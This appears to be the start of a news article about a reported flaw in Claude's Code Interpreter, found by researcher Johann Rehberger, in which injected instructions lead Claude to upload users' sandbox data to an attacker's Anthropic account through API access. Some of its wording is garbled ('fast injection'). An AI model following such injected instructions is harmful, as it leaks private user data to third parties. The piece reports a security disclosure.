Claude can be tricked into sending his company’s private data to hackers; all it takes is a few kind words.



  • Claude’s code interpreter can be exploited to leak private user data via fast injection
  • The researcher tricked Claude into uploading sandbox data to his Anthropic account using API access
  • Anthropic now treats these vulnerabilities as reportable and encourages users to monitor or disable access.

Claude, one of the most popular AI tools out there, has a vulnerability that allows threat actors to exfiltrate users’ private data, experts have warned.

Cybersecurity researcher Johann Rehberger, also known as Wunderwuzzi, who recently wrote an in-depth report on his findings, found that the core of the problem is Claude’s Code Interpreter, a sandboxed environment that allows AI to write and execute code (for example, to analyze data or generate files) directly within a conversation.



Leave a Comment

Your email address will not be published. Required fields are marked *